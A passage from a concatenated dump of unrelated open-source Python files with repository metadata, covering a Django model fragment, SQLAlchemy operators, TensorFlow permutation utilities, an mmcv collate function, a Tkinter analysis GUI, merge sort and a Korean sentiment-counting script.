slug = models.SlugField(default="",blank=True,null=False,db_index=True) #harry-potter-1
published_countries = models.ManyToManyField(Country)
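    # slugify is imported above but never used; a common pattern (an assumption
    # here, not part of the original model) is to derive the slug on save:
    def save(self, *args, **kwargs):
        self.slug = slugify(self.title)
        super().save(*args, **kwargs)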
def get_absolute_url(self):
return reverse("book-detail", args=[self.slug])
def __str__(self):
return f"{self.title},{self.author},({self.rating}),{self.is_bestselling}"
|
[
"60098288+Aaryan8751@users.noreply.github.com"
] |
60098288+Aaryan8751@users.noreply.github.com
|
4fa9ce1aad6ca26d797aa1901cf0cc04ee1027c2
|
ea4e3ac0966fe7b69f42eaa5a32980caa2248957
|
/download/unzip/pyobjc/pyobjc-14/pyobjc/stable/pyobjc-core/Tools/Signatures/setup.py
|
f1adc0b7e5b2310c7042f32969605f7568eecab4
|
[
"MIT"
] |
permissive
|
hyl946/opensource_apple
|
36b49deda8b2f241437ed45113d624ad45aa6d5f
|
e0f41fa0d9d535d57bfe56a264b4b27b8f93d86a
|
refs/heads/master
| 2023-02-26T16:27:25.343636
| 2020-03-29T08:50:45
| 2020-03-29T08:50:45
| 249,169,732
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 397
|
py
|
from distutils.core import setup
import py2app
import glob
plist = dict(
CFBundleShortVersionString='0.1',
#CFBundleIconFile='EggShell.icns',
CFBundleGetInfoString='Signatures',
CFBundleIdentifier='net.sf.pyobjc.signatures',
CFBundleName='Signatures',
)
setup(
app=["main.py"],
data_files=["MainMenu.nib", "tools.py" ],
options=dict(py2app=dict(plist=plist)),
)
|
[
"hyl946@163.com"
] |
hyl946@163.com
|
df34ee40adc9a2b88f56bdbbeeb374d54ec7f417
|
b77dc17ee7ebad73e1028381739e01f708fb6c8b
|
/sqlalchemy/sql/operators.py
|
0047d1c732e66a89e1afa3284fe90cdef801e721
|
[] |
no_license
|
typerlc/ankice-deps
|
6c97bee1a926fc539b2f2e8ec345244e6188c6f1
|
4267af31c56ff2f51be65cad345fc7100ec53e78
|
refs/heads/master
| 2016-09-01T21:43:41.904988
| 2009-06-24T15:15:12
| 2009-06-24T15:15:12
| 235,231
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,221
|
py
|
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Defines operators used in SQL expressions."""
from operator import and_, or_, inv, add, mul, sub, div, mod, truediv, \
lt, le, ne, gt, ge, eq
from sqlalchemy.util import Set, symbol
def from_():
raise NotImplementedError()
def as_():
raise NotImplementedError()
def exists():
raise NotImplementedError()
def is_():
raise NotImplementedError()
def isnot():
raise NotImplementedError()
def op(a, opstring, b):
return a.op(opstring)(b)
def like_op(a, b, escape=None):
return a.like(b, escape=escape)
def notlike_op(a, b, escape=None):
raise NotImplementedError()
def ilike_op(a, b, escape=None):
return a.ilike(b, escape=escape)
def notilike_op(a, b, escape=None):
raise NotImplementedError()
def between_op(a, b, c):
return a.between(b, c)
def in_op(a, b):
return a.in_(*b)
def notin_op(a, b):
raise NotImplementedError()
def distinct_op(a):
return a.distinct()
def startswith_op(a, b, escape=None):
return a.startswith(b, escape=escape)
def endswith_op(a, b, escape=None):
return a.endswith(b, escape=escape)
def contains_op(a, b, escape=None):
return a.contains(b, escape=escape)
def comma_op(a, b):
raise NotImplementedError()
def concat_op(a, b):
return a.concat(b)
def desc_op(a):
return a.desc()
def asc_op(a):
return a.asc()
_commutative = Set([eq, ne, add, mul])
def is_commutative(op):
return op in _commutative
_smallest = symbol('_smallest')
_largest = symbol('_largest')
_PRECEDENCE = {
from_:15,
mul:7,
div:7,
mod:7,
add:6,
sub:6,
concat_op:6,
ilike_op:5,
notilike_op:5,
like_op:5,
notlike_op:5,
in_op:5,
notin_op:5,
is_:5,
isnot:5,
eq:5,
ne:5,
gt:5,
lt:5,
ge:5,
le:5,
between_op:5,
distinct_op:5,
inv:5,
and_:3,
or_:2,
comma_op:-1,
as_:-1,
exists:0,
_smallest: -1000,
_largest: 1000
}
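# True when `operator` binds no more tightly than `against`; callers use this
# to decide whether a nested expression needs parentheses. Operators missing
# from the table fall back to the _smallest/_largest sentinels.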
def is_precedent(operator, against):
return _PRECEDENCE.get(operator, _PRECEDENCE[_smallest]) <= _PRECEDENCE.get(against, _PRECEDENCE[_largest])
|
[
"richardc@pippin.(none)"
] |
richardc@pippin.(none)
|
f11e2d660314492bce89f350ca42c8613614baba
|
bd5683b3857ea44a231b9d70a6986da554061850
|
/voi/permutation_utils.py
|
6facbbfa7a4a3a9e65d8ac4460f2d7e930ded5b4
|
[] |
no_license
|
anonymouscode115/autoregressive_inference
|
791ee18865cdac2c7cb47bf5584c0c145039d0d5
|
14860f55a5fd073145e8e063027ecdfb31feecd4
|
refs/heads/master
| 2023-08-18T22:20:43.338728
| 2021-10-25T06:49:17
| 2021-10-25T06:49:17
| 300,373,798
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,822
|
py
|
import tensorflow as tf
# @tf.function(input_signature=[
# tf.TensorSpec(shape=[None, None, None, None], dtype=tf.float32)])
def permutation_to_pointer(permutation):
"""Converts a permutation matrix to the label distribution of
a pointer network for training a language model
Arguments:
permutation: tf.Tensor
a permutation matrix that defines the order in which
words are inserted by the language model
Returns:
pointer: tf.Tensor
a ternary matrix that contains relative positions of words
inserted by a language model non-sequentially"""
# make sure the permutation is an int or the below computation
# does not make sense
permutation = tf.cast(permutation, tf.int32)
n = tf.shape(permutation)[-1]
# this first section will convert the one-hot style indexing to
# a ternary indexing where -1 means insert to the right of
# and 1 means insert to the left of word x
unsorted_relative = -tf.math.cumsum(
permutation, axis=-1, exclusive=True) + tf.math.cumsum(
permutation, axis=-1, exclusive=True, reverse=True)
# sort the relative positions into the decoding order induced
# by the permutation
sorted_relative = tf.matmul(
permutation, unsorted_relative, transpose_b=True)
# get the one hot distribution of pointer labels; should contain
# a sparse lower triangular matrix
sorted_ptr = tf.cast(tf.reduce_sum(tf.maximum(
0, tf.linalg.band_part(sorted_relative, 0, -1)), axis=-2), tf.int32)
# the variable sorted_ptr is in sorted partial positions but the pointer
# network reuses state and does not sort as decoding progresses
# so we need to convert into unsorted ptr positions
partial_pos = tf.repeat(
sorted_relative[..., tf.newaxis, :, :], n, axis=-3)
partial_pos = tf.linalg.band_part(
tf.transpose(partial_pos, [0, 1, 4, 3, 2]), 0, -1)
partial_pos = tf.linalg.band_part(
tf.transpose(partial_pos, [0, 1, 3, 2, 4]), 0, -1)
partial_pos = tf.cast(tf.reduce_sum(tf.maximum(
0, tf.transpose(partial_pos, [0, 1, 4, 2, 3])), axis=-2), tf.int32)
# lookup the sorted positions in a table of unsorted positions
unsorted_ptr = tf.argmin(tf.abs(sorted_ptr[
..., tf.newaxis] - 1 - partial_pos), axis=-1, output_type=tf.int32)
# the start token is never inserted so we can slice out the first channel
# in addition there are only n - 1 valid insertion locations
return tf.one_hot(unsorted_ptr[..., 1:], n - 1), partial_pos[:, :, :-1, :-1]
# @tf.function(input_signature=[
# tf.TensorSpec(shape=[None, None, None, None], dtype=tf.float32)])
def permutation_to_relative(permutation):
"""Converts a permutation matrix to a relative position
matrix for training a language model
Arguments:
permutation: tf.Tensor
a permutation matrix that defines the order in which
words are inserted by the language model
Returns:
relative: tf.Tensor
a ternary matrix that contains relative positions of words
inserted by a language model non-sequentially"""
# make sure the permutation is an int or the below computation
# does not make sense
permutation = tf.cast(permutation, tf.int32)
# this first section will convert the one-hot style indexing to
# a ternary indexing where -1 means insert to the right of
# and 1 means insert to the left of word x
unsorted_relative = -tf.math.cumsum(
permutation, axis=-1, exclusive=True) + tf.math.cumsum(
permutation, axis=-1, exclusive=True, reverse=True)
# sort the relative positions into the decoding order induced
# by the permutation
sorted_relative = tf.matmul(
permutation, unsorted_relative, transpose_b=True)
# get the one hot distribution of relative positions; contains
# a one at location i when [left, center, right]_i
return tf.one_hot(sorted_relative[..., :-1, :-1] + 1, 3)
def pt_permutation_to_relative_l2r(s0, s1, n):
"""Converts a l2r permutation matrix to a relative position
matrix for training a language model; for permutation
transformer use only
Arguments:
s0: batch size
s1: sentence length
n: clip of position difference
Returns:
relative: tf.Tensor
a ternary matrix that contains relative positions of words
inserted by a language model non-sequentially"""
sorted_relative = tf.range(s1)[tf.newaxis, tf.newaxis, :]
sorted_relative = tf.tile(sorted_relative, [s0, s1, 1])
shift = tf.range(s1)[tf.newaxis, :, tf.newaxis]
sorted_relative = sorted_relative - shift
sorted_relative = tf.clip_by_value(sorted_relative, -n, n)
sorted_relative = tf.cast(sorted_relative, tf.int32)
# get the one hot distribution of relative positions; contains
# a one at location i when [left, center, right]_i
return tf.one_hot(sorted_relative + n,
tf.cast(2*n+1, tf.int32))
# @tf.function(input_signature=[
# tf.TensorSpec(shape=[None, None], dtype=tf.float32),
# tf.TensorSpec(shape=[None, None], dtype=tf.int32),
# tf.TensorSpec(shape=None, dtype=tf.string)])
def get_permutation(mask, words, order):
"""Construct a discrete permutation matrix for training a non sequential
autoregressive model using gradient descent
Arguments:
mask: tf.Tensor
a tensor containing zeros and ones which indicate which elements
of words are out of bounds
words: tf.Tensor
the batch of word ids that will be used to determine the
permutation when using rare or common
order: tf.Tensor
the autoregressive ordering to train Transformer-InDIGO using;
l2r, r2l, rare, or common
Returns:
permutation: tf.Tensor
a permutation matrix for training a non sequential autoregressive
model using gradient descent"""
# the dataset is not compiled with an ordering so one must
# be generated on the fly during training; only applies
# when using a pointer layer; note that the end token
# must always be last and start token must always be first
b, n = tf.shape(words)[0], tf.shape(words)[1]
if tf.equal(order, 'r2l'): # corresponds to right-to-left
length = tf.cast(tf.reduce_sum(mask, axis=1), tf.int32)
ind = tf.tile(tf.range(n - 1)[tf.newaxis], [b, 1])
ind = tf.reverse_sequence(ind, length - 2, seq_axis=1, batch_axis=0)
ind = tf.concat([tf.fill([b, 1], 0), 1 + ind], axis=1)
elif tf.equal(order, 'rare'): # corresponds to rare-first
upper_bound = tf.reduce_max(words, axis=1, keepdims=True) + 1
scores = tf.where(tf.equal(words, 0), -tf.ones_like(words), words)
scores = tf.where(tf.equal(words, 1), upper_bound, scores)
scores = tf.where(tf.equal(words, 2), upper_bound + 1, scores)
scores = tf.where(tf.equal(words, 3), tf.zeros_like(words), scores)
ind = tf.argsort(scores, direction='DESCENDING')
elif tf.equal(order, 'common'): # corresponds to common-first
upper_bound = tf.reduce_max(words, axis=1, keepdims=True) + 1
scores = tf.where(tf.equal(words, 0), upper_bound + 2, words)
scores = tf.where(tf.equal(words, 1), upper_bound, scores)
scores = tf.where(tf.equal(words, 2), tf.zeros_like(words), scores)
scores = tf.where(tf.equal(words, 3), upper_bound + 1, scores)
ind = tf.argsort(scores, direction='ASCENDING')
elif tf.equal(order, 'test'):
ords = tf.concat([[0,6,1,4,7,3,2,5], tf.range(8, n)], axis=0)
ind = tf.tile(ords[tf.newaxis], [b, 1])
else: # corresponds to left-to-right
ind = tf.tile(tf.range(n)[tf.newaxis], [b, 1])
return tf.one_hot(ind, n)
|
[
"anonymouscode12345679@gmail.com"
] |
anonymouscode12345679@gmail.com
|
a50971d3565c9ef0c524198dfbe6e7d2b2f6711c
|
2a01ca22001bb0f07a5a6a450188015de6258838
|
/pypelines/pipeline.py
|
ccee51497ee86878c4a7418d28ae7d9bf04d75f0
|
[] |
no_license
|
gacou54/pypelines-etl
|
0d1a1c6052db8fe0bc2058a5c0bdd210a3de50a1
|
3834f8141a130fb5834a2ac529ef4995f1845718
|
refs/heads/main
| 2023-01-12T21:32:52.363007
| 2020-11-02T23:25:55
| 2020-11-02T23:25:55
| 309,442,074
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 630
|
py
|
from typing import Any, Union
from pypelines.load import Loader
from pypelines.transform import Transformer
class Pipeline:
def __init__(self, data: Any) -> None:
self.data = data
def __or__(self, other: Union[Transformer, Loader]) -> 'Pipeline':
if isinstance(other, Transformer):
self.data = other.func(self.data)
elif isinstance(other, Loader):
other.load(self.data)
else:
            raise TypeError(f'Accepted types are Transformer or Loader. Got {type(other)}.')
return self
@property
def value(self):
return self.data
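# Usage sketch (with a hypothetical `double` Transformer and `to_stdout` Loader):
#   result = (Pipeline([1, 2, 3]) | double | to_stdout).value
# Each `|` either transforms the data in place or hands it to a loader.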
|
[
"gacou54@gmail.com"
] |
gacou54@gmail.com
|
892891392ffd5a98cea4905d7db7d30e05ca5d79
|
199aeceddce2466d329c628256bb76aec234860a
|
/python/problempack/my_functions.py
|
6dd483e147d7b0303bbdfa04f5e2d99e9f3672e1
|
[] |
no_license
|
jaredivory/COM250
|
5086c2277ff9abde8122503763f1db24248f3a73
|
f2e33f317ad48623f6fb9bd1f9704b0e0f138897
|
refs/heads/master
| 2020-07-24T11:04:30.568596
| 2019-09-14T17:09:41
| 2019-09-14T17:09:41
| 207,902,637
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,786
|
py
|
import datetime, math
def questionBlock(num):
"Creates a block to seperate the questions"
print("########################################################## %d ##########################################################" % num)
def average(lst):
return sum(lst) / len(lst)
def addTax(inital_price, salesTax=.08675):
return ( inital_price * salesTax ) + inital_price
def minsToDays(mins):
return (mins / (60 * 24))
def minsToHr(mins):
return (mins / 60)
def celsiusToFahrenheit(celsius):
return celsius * 9/5 + 32
def compoundInterestAnnual(amtInvested, interest, years):
"Takes principal and interest then computes amount after years"
amtInvested = (amtInvested * interest) + amtInvested
years -= 1
if (years == 0):
return amtInvested
return compoundInterestAnnual(amtInvested, interest, years)
def compoundInterestQuarterly(amtInvested, interest, years):
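    # Compounds four times per year before recursing, so `interest` is the quarterly rate.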
for i in range(1, 5):
amtInvested = (amtInvested * interest) + amtInvested
years -= 1
if(years == 0):
return amtInvested
return compoundInterestQuarterly(amtInvested, interest, years)
def hhmmssToSeconds(hhmmss):
"Returns seconds from time format HH:MM:SS"
hrs,mins,secs = hhmmss.split(":")
hrs = int(hrs)
mins = int(mins)
secs = int(secs)
secs += hrs*3600 + mins*60
return secs
def secondsSinceVoyagerLaunch():
return datetime.datetime.now().timestamp() - datetime.datetime(1977,9,5,12,56).timestamp()
def averageVelocity(displacement, elapsedTime):
"Takes displacement (meters) and elapsed time (seconds) and returns velocity (m/s)"
return displacement / elapsedTime
def getRadius(squareFeet):
    # The area of a circle is pi * r**2, so r = sqrt(area / pi).
    return math.sqrt(squareFeet / math.pi)
def getCircumference(radius):
return math.pi * 2 * radius
|
[
"ivorj32@mail.sunysuffolk.edu"
] |
ivorj32@mail.sunysuffolk.edu
|
a1a5d2baee6a657f373f20f0a42af77da3bae684
|
793d8a6030e91939e44dd2c010a06fa24262d238
|
/mmcv/parallel/collate.py
|
bf12a11551035e61992af062e382f072c4def075
|
[
"Apache-2.0"
] |
permissive
|
manlinting/mmcv
|
bfdd71136d794268838401e225579688bb6ca64e
|
ae9d3cc41054712ee54940d8657606afef4fc066
|
refs/heads/master
| 2020-04-04T18:54:34.503076
| 2019-09-25T09:21:25
| 2019-09-25T09:21:25
| 156,184,602
| 1
| 0
|
Apache-2.0
| 2018-11-05T08:30:30
| 2018-11-05T08:30:30
| null |
UTF-8
|
Python
| false
| false
| 2,631
|
py
|
import collections
import torch
import torch.nn.functional as F
from torch.utils.data.dataloader import default_collate
from .data_container import DataContainer
def collate(batch, samples_per_gpu=1):
"""Puts each data field into a tensor/DataContainer with outer dimension
batch size.
Extend default_collate to add support for
:type:`~mmcv.parallel.DataContainer`. There are 3 cases.
1. cpu_only = True, e.g., meta data
2. cpu_only = False, stack = True, e.g., images tensors
3. cpu_only = False, stack = False, e.g., gt bboxes
"""
if not isinstance(batch, collections.Sequence):
raise TypeError("{} is not supported.".format(batch.dtype))
if isinstance(batch[0], DataContainer):
assert len(batch) % samples_per_gpu == 0
stacked = []
if batch[0].cpu_only:
for i in range(0, len(batch), samples_per_gpu):
stacked.append(
[sample.data for sample in batch[i:i + samples_per_gpu]])
return DataContainer(
stacked, batch[0].stack, batch[0].padding_value, cpu_only=True)
elif batch[0].stack:
for i in range(0, len(batch), samples_per_gpu):
assert isinstance(batch[i].data, torch.Tensor)
# TODO: handle tensors other than 3d
assert batch[i].dim() == 3
c, h, w = batch[0].size()
for sample in batch[i:i + samples_per_gpu]:
assert c == sample.size(0)
h = max(h, sample.size(1))
w = max(w, sample.size(2))
padded_samples = [
F.pad(
sample.data,
(0, w - sample.size(2), 0, h - sample.size(1)),
value=sample.padding_value)
for sample in batch[i:i + samples_per_gpu]
]
stacked.append(default_collate(padded_samples))
else:
for i in range(0, len(batch), samples_per_gpu):
stacked.append(
[sample.data for sample in batch[i:i + samples_per_gpu]])
return DataContainer(stacked, batch[0].stack, batch[0].padding_value)
elif isinstance(batch[0], collections.Sequence):
transposed = zip(*batch)
return [collate(samples, samples_per_gpu) for samples in transposed]
elif isinstance(batch[0], collections.Mapping):
return {
key: collate([d[key] for d in batch], samples_per_gpu)
for key in batch[0]
}
else:
return default_collate(batch)
|
[
"chenkaidev@gmail.com"
] |
chenkaidev@gmail.com
|
60568d589b90c68d424abfd846ffc728bfe55508
|
cf7ffa061f11d14de372002475e0852d20c7e020
|
/src/scripts/gui/main_kernel.py
|
72879a1dbb6ef152e3f6ffb11f49227080fa9ca4
|
[] |
no_license
|
olonyk/cs4
|
7612a2869d658eb4e487ba96a18875b0116b7810
|
e2f8ad12058460d4647c9de5e357c95a789b01e6
|
refs/heads/master
| 2021-09-06T18:59:19.960656
| 2018-02-10T00:55:13
| 2018-02-10T00:55:13
| 116,160,747
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,493
|
py
|
import json
import sys
import time
from os.path import dirname, isfile, join
from tkinter import Tk
from tkinter.filedialog import askopenfilename, asksaveasfilename
from numpy import (array, asarray, binary_repr, concatenate, delete, int8,
linalg, logical_and, logical_or, ones, shape, zeros)
from scipy.special import binom
from ..processes.bm_wrapper import BM_Wrapper
from .export_kernel import ExportKernel
from .main_gui import MainGUI
from .preview_kernel import PreviewKernel
from .reader_kernel import ReaderKernel
from ..support.widgets import ViewLog
class MainKernel(object):
def __init__(self, args):
if getattr(sys, 'frozen', False):
# We are running in a bundle, figure out the bundle dir.
bundle_dir = sys._MEIPASS
            # Redirect stdout and stderr to a file to log behaviour.
stdout_file = join(bundle_dir, "src", "resources", "settings", "stdout.txt")
sys.stdout = open(stdout_file, 'w')
sys.stderr = open(stdout_file, 'w')
# Find the settings file.
self.sfile = join(bundle_dir, "src", "resources", "settings", "settings.json")
else:
# We are running in a normal Python environment.
# Find the settings file.
self.sfile = join(dirname(dirname(dirname(__file__))),
"resources",
"settings",
"settings.json")
# Read settings file
self.settings = json.load(open(self.sfile))
# Initialize variables
self.data = []
self.header = []
self.age = []
self.sex = []
self.ffan = {}
self.row_map = []
self.result_table = []
self.app = None
# Create the GUI
self.root = Tk()
self.root.title("CS4")
self.root.minsize(width = 600, height = 600)
self.app = MainGUI(self.root, self)
def run(self):
print("Main Kernel running")
while True:
try:
self.root.mainloop()
break
except UnicodeDecodeError:
pass
self.root.destroy()
def cmd_import(self, *args):
print("CMD import")
file_name = askopenfilename()
if file_name:
ReaderKernel(self, file_name)
self.row_map = ones(len(self.data))
self.update_overview()
self.default_settings()
def cmd_view_log(self, *args):
print("CMD view log")
args = ()
ViewLog()
def default_settings(self, app=None):
if not app:
app=self.app
if self.age:
app.settings["min_age"].set(str(min(self.age)))
app.settings["max_age"].set(str(max(self.age)))
else:
try:
app.settings["min_age"].set("N/A")
app.settings["max_age"].set("N/A")
except:
pass
if self.sex:
app.settings["sex"].set(" ".join([str(x) for x in list(set(self.sex))]))
else:
app.settings["sex"].set("N/A")
if self.ffan:
app.settings["ffan_list"] = self.ffan.keys()
app.update_ffan()
def update_overview(self):
if self.header:
self.app.build_overview(self.data, self.header)
def cmd_export(self):
print("CMD export")
if self.result_table:
file_name = asksaveasfilename(defaultextension=".xlsx")
            if not file_name:  # asksaveasfilename returns '' if the dialog is closed with "cancel".
return
ExportKernel(self, self.result_table, file_name)
def cmd_execute(self):
print("CMD execute")
if self.app.col_map:
data = array(self.data)
data = delete(data, [i for i, col in enumerate(self.app.col_map) if not col], axis=1)
if hasattr(self.row_map, "shape"):
data = delete(data, [i for i, row in enumerate(self.row_map) if not row], axis=0)
print("shape(data):", shape(data))
# Bad settings
if int(self.app.settings["max_clust"].get()) == 0 or not shape(data)[1]:
return
meta_data = {"pos_val":self.get_vals(self.app.settings["pos_val"]),
"neg_val":self.get_vals(self.app.settings["neg_val"]),
"max_clust":int(self.app.settings["max_clust"].get()),
"min_clust":int(self.app.settings["min_clust"].get()),
"min_age":self.app.settings["min_age"].get(),
"max_age":self.app.settings["max_age"].get(),
"sex":self.app.settings["sex"].get(),
"ffan":self.app.settings["ffan_var"].get()}
pos_val = self.get_vals(self.app.settings["pos_val"])
neg_val = self.get_vals(self.app.settings["neg_val"])
print(meta_data)
max_clust = int(self.app.settings["max_clust"].get())
startTime = time.time()
result_dictionary = BM_Wrapper().analyse(max_cluster=max_clust,
data=data,
pos_map=pos_val,
neg_map=neg_val)
elapsedTime = time.time() - startTime
print("Elapsed time:", elapsedTime)
meta_data["elapsedTime"] = self.to_str_time(elapsedTime, times=2)
self.settings["exe_time"].append([int(self.app.info_text[1].get()), elapsedTime])
self.save_settings()
self.update_info()
self.result_table = self.get_res_table(result_dictionary)
PreviewKernel(self.result_table, meta_data)
def get_res_table(self, result_dictionary):
sco_vec = result_dictionary["score_vec"]
pat_vec = result_dictionary["pattern_vec"]
pos_vec = result_dictionary["pos_vec"]
neg_vec = result_dictionary["neg_vec"]
header = [h for h, c in zip(self.header, self.app.col_map) if c]
# First row with headers
cols = len(header)
styles = []
for pattern in pat_vec:
col_pattern = self._bin_array(int(pattern), cols)
row_s = []
for i, col in enumerate(col_pattern):
if col:
row_s.append(header[i])
styles.append(row_s)
result_table = [[""]*(len(header)+1) for x in range(len(header)+4)]
for i, row in enumerate(result_table):
if i == 0:
for j, _ in enumerate(row):
if not j == 0:
result_table[i][j] = j
elif i == len(header)+1:
for j, _ in enumerate(row):
if j == 0:
result_table[i][j] = "+"
else:
try:
result_table[i][j] = int(pos_vec[j-1])
except OverflowError:
result_table[0][j] = ""
elif i == len(header)+2:
for j, _ in enumerate(row):
if j == 0:
result_table[i][j] = "-"
else:
try:
result_table[i][j] = int(neg_vec[j-1])
except OverflowError:
pass
elif i == len(header)+3:
for j, _ in enumerate(row):
if j == 0:
result_table[i][j] = "Total"
else:
try:
result_table[i][j] = int(sco_vec[j-1])
except OverflowError:
pass
else:
for j, style in enumerate(styles):
if len(style) > i-1:
result_table[i][j+1] = style[i-1]
return result_table
def get_vals(self, val_str_var):
return [int(s) for s in val_str_var.get() if s.isdigit()]
def save_settings(self):
# Save the updated settings file.
with open(self.sfile, 'w') as jsonfile:
json.dump(self.settings, jsonfile)
def cmd_max_cluster_updated(self, *args):
print("CMD max_cluster_updated")
if self.app.settings["max_clust"].get():
val = self.app.settings["max_clust"].get()
try:
if int(val) > sum(self.app.col_map):
self.app.settings["max_clust"].set(str(sum(self.app.col_map)))
except ValueError:
self.app.settings["max_clust"].set(str(sum(self.app.col_map)))
self.update_info()
def cmd_min_cluster_updated(self, *args):
print("CMD min_cluster_updated")
if self.app.settings["min_clust"].get():
val = self.app.settings["min_clust"].get()
try:
if int(val) > int(self.app.settings["max_clust"].get()):
self.app.settings["min_clust"].set(self.app.settings["max_clust"].get())
except ValueError:
self.app.settings["max_clust"].set("1")
self.update_info()
def get_age_filter(self):
age_bitmap = ones(len(self.data))
if self.age:
try:
min_age = int(self.app.settings["min_age"].get())
max_age = int(self.app.settings["max_age"].get())
age_bitmap = logical_and(array(self.age) >= min_age,
array(self.age) <= max_age)
except ValueError:
pass
elif self.app:
self.app.settings["min_age"].set("N/A")
self.app.settings["max_age"].set("N/A")
return age_bitmap
def get_sex_filter(self):
if self.sex:
try:
sex_bitmap = zeros(len(self.data))
sexes = self.get_vals(self.app.settings["sex"])
for sex in sexes:
sex_bitmap = logical_or(sex_bitmap,
array(self.sex) == sex)
return sex_bitmap
except ValueError:
pass
elif self.app:
self.app.settings["sex"].set("N/A")
return ones(len(self.data))
def cmd_age_updated(self, *args):
print("CMD cmd_age_updated")
age_bitmap = self.get_age_filter()
sex_bitmap = self.get_sex_filter()
fan_bitmap = self.get_fan_filter()
self.row_map = logical_and(age_bitmap, sex_bitmap)
self.row_map = logical_and(self.row_map, fan_bitmap)
if self.app:
self.update_info()
def get_fan_filter(self):
fan_bitmap = ones(len(self.data))
if self.ffan:
fan_string = self.app.settings["ffan_var"].get()
if fan_string == "All" or fan_string == "":
fan_bitmap = ones(len(self.data))
else:
fan_bitmap = asarray(self.ffan[fan_string])
return fan_bitmap
def cmd_quit(self):
print("CMD quit")
self.root.destroy()
def update_info(self):
if self.app.col_map:
nr_cols = sum(self.app.col_map)
# Update number of columns
self.app.info_text[0].set(str(nr_cols))
# Update number of combination to check
combs = 0
for i in range(1, int(self.app.settings["max_clust"].get())+1):
combs += binom(sum(self.app.col_map), i)
self.app.info_text[1].set(str(int(combs)))
# Update number of participants
self.app.info_text[2].set("{:d}".format(int(sum(self.row_map))))
# Update estimated time using linear interpolation
dat = array(self.settings["exe_time"])
#def lin_extrapolate(self, x, y, point):
exe_times = self.lin_extrapolate(dat[:,0], dat[:,1], combs)[0]
str_time = self.to_str_time(exe_times, times=2)
self.app.info_text[3].set(str_time)
def to_str_time(self, seconds, times=1):
if seconds < 0:
return "Very fast"
intervals = (
('weeks', 604800), # 60 * 60 * 24 * 7
('days', 86400), # 60 * 60 * 24
('hours', 3600), # 60 * 60
('minutes', 60),
('seconds', 1),
)
result = []
ts = 0
for name, count in intervals:
value = seconds // count
if value:
seconds -= value * count
if value == 1:
name = name.rstrip('s')
result.append("{} {}".format(int(value), name))
ts += 1
if ts >= times:
break
if not result:
return "{:0.2f}s".format(seconds)
return ', '.join(result[:])
def lin_extrapolate(self, x, y, point):
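        # Least-squares fit of y = m*x + c through the points, then evaluate
        # the fitted line at `point`.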
x = array([x])
x = concatenate((x, ones(shape(x))), axis=0).T
y = array([y]).T
m, c = linalg.lstsq(x, y)[0]
return m*point + c
def _bin_array(self, num, m):
"""Convert a positive integer num into an m-bit bit vector
"""
return array(list(binary_repr(num).zfill(m))).astype(int8)
|
[
"olov.nykvist@lybe.se"
] |
olov.nykvist@lybe.se
|
70beeacc3ecefbd7c0c2f749a8512c7a21f26725
|
5a8543c4739e7c7d7db3b2712f07e345cc24bc88
|
/merge_sort.py
|
e35fe503745602aff2004a323f39a59e9bdadaf4
|
[] |
no_license
|
thesmitpatel/Algorithm
|
d50b8f43c7d109ad0710505c5071003468b5d276
|
54c473be3245fa5fa455a0f310eccacbff5dfbe3
|
refs/heads/master
| 2022-12-29T19:19:07.474562
| 2020-10-22T05:55:18
| 2020-10-22T05:55:18
| 306,227,169
| 0
| 1
| null | 2020-10-22T05:55:19
| 2020-10-22T04:59:21
|
Python
|
UTF-8
|
Python
| false
| false
| 747
|
py
|
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
#python program to illustrate the merge sort algorithm
def mergesort(list1):
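    # Split the list in half, recursively sort each half, then merge the two
    # sorted halves back together (O(n log n) comparisons overall).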
n=len(list1)
if(n>1):
mid=n//2
l=list1[:mid]
r=list1[mid:]
mergesort(l)
mergesort(r)
i=j=k=0
while(i<len(l) and j<len(r)):
if(l[i]<r[j]):
list1[k]=l[i]
i+=1
else:
list1[k]=r[j]
j+=1
k+=1
while(i<len(l)):
list1[k]=l[i]
i+=1
k+=1
while(j<len(r)):
list1[k]=r[j]
j+=1
k+=1
return list1
list1=[int(x) for x in input().split()]
print(mergesort(list1))
# In[ ]:
|
[
"61879629+thesmitpatel@users.noreply.github.com"
] |
61879629+thesmitpatel@users.noreply.github.com
|
0c4672ce565c2e2d0af1584bc8f02e08bb128b9c
|
79c184b90f3bc8fb33042061d66ecabfc5c7a79c
|
/progress/1123_mg.py
|
1603842288ec6d91f55d5c0c607777a009c6bd14
|
[
"Apache-2.0"
] |
permissive
|
seawavve/CSR
|
bc11ff242a6fdbc3823154ccb1dc1a949d030e73
|
66bfed8a1585c252e6b00c9fee36db7f3a4ba30a
|
refs/heads/main
| 2023-02-03T15:55:07.677278
| 2020-12-20T08:46:22
| 2020-12-20T08:46:22
| 308,579,516
| 2
| 1
| null | 2020-12-20T08:42:35
| 2020-10-30T09:14:59
|
Python
|
UTF-8
|
Python
| false
| false
| 2,083
|
py
|
from konlpy.tag import Okt
okt=Okt()
## Additional code: keyword frequency histogram
Hist = lex2.copy()
Hist['Frequency'] = 0
res=[0,0,0] #Positive,Negative,Moderative
pre_texts=[] # keep the preprocessed morphemes as a 2D list for the next sentiment-training step
for i in range(len(dataset)): # not fully verified; if it breaks, change to range(len(dataset)) or range(20)
text=''
text=dataset.loc[i,'본문']
    pre_text=okt.morphs(text) # split into morphemes
pre_texts.append(pre_text)
pos=0
neg=0
    for j in range(len(pre_text)): # count when a morpheme matches the lexicon and is marked 1 as positive/negative
for k in range(len(lex2)):
if pre_text[j]==str(lex2.index[k]):
if lex2.iloc[k,0]==1:
pos+=1
if lex2.iloc[k,1]==1:
neg+=1
Hist.iloc[k,2] += 1
if pos>neg:
dataset.loc[i,'pos_neg']=1
res[0]+=1
elif neg>pos:
dataset.loc[i,'pos_neg']=-1
res[1]+=1
    else:  # neutral
dataset.loc[i,'pos_neg']=0
res[2]+=1
print(res)
# Extract the keyword histograms
Valid_Hist_check = Hist['Frequency'] > 1
Valid_Hist = Hist[Valid_Hist_check]
Valid_Hist = Valid_Hist.sort_values(by='Frequency',ascending=False)
Positive_Hist_check = Valid_Hist['Positive'] == 1
